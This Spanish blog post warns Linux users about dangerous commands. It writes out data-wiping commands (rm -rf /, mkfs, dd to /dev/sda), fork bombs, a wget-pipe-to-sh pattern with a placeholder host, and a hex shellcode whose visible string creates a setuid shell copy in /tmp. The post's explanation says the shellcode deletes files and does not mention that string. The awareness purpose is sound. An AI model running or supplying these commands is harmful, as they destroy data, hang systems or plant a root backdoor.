1.3 Comandos Peligrosos.

Estos son algunos de ellos.

Hay mucha gente que nos quiere joder el sistema, y por varios metodos nos quieren colar scripts o hacernos meter comandos riesgozos en una terminal. El objetivo de este texto (obtenido de la comunidad de Ubuntu en inglés) es hacernos mas concientes de los peligrosos comandos en la red y como evitarlos.

– Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.

Código:
rm -rf /
rm -rf .
rm -rf *

– Este comando borrará todos los archivos ocultos en el directorio actual:

Código:
rm -r .*

El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos:

Código:
rm -r .[^.]*

– Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:

Código:
mkfs
mkfs.ext3
mkfs.anything

– Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:

Código:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:

Código:
:(){:|:&};:

Una forkbomb en Perl:

Código:
fork while fork

Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.

Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco.

Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con — . No confies y no ejecutes codigos que no estes seguro de su confiabilidad.

Código:
wget http://some_place/some_file
sh ./some_file

Código:
wget http://some_place/some_file -O- | sh

Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).

Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.

Código:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esto ultimo en realidad ejecuta ‘rm -rf ~ / &’, lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.

_________________________________________________________________

En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.

Fuente: Overkiller

2 comentarios »

  1. raul07rrr said,

    muy interesante esta entrada, no sabia nada del tema

  2. Edwin said,

    me gusto mucho su comentario, pero me gustaria saber como ejecutarlo esos comando aunque no sea para hacerle daño a nadie simplemente por que me gusta mucho aprender de lo que no se, gracias


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: